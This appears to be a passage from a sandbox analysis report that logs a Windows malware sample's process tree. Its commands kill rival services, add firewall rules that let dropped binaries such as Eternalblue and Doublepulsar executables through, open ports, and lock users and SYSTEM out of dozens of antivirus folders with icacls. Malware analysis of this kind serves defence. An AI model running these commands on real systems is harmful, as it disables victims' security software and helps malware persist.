C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:800
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵
- System Location Discovery: System Language Discovery
PID:5380 -
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:3280
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:5472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:4472
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:1072
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:5208
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:1472
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:1664
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:1956
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:6088 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:5824
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:2296
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:4604
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:1704
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:4800
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:5448
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:5592
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:4608
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:5484
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:4588
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:3920
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:448
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:428
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:3580
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1372 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:2080
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4812
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:5616
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:5412
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:1664
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:5196
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:6132
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:2364
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:1040
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:3912 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:4764
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:2296
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:1136
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:5184
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:3304
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:1492
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:6052
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:200
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:5464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:5688
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:2844
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵PID:2816
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:3568
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:244
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵PID:5512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:5944
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:6028
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:5948
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:5256
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:5220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:6072 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:5584
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5332
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3392
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:5192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3496
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:872
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:5992
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4528 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:448
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5380
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2960
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:2804
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:5220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5980
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4548
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:3028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5584
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2500
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:5444
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5264 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:3124
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:5660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3040
-
-
-
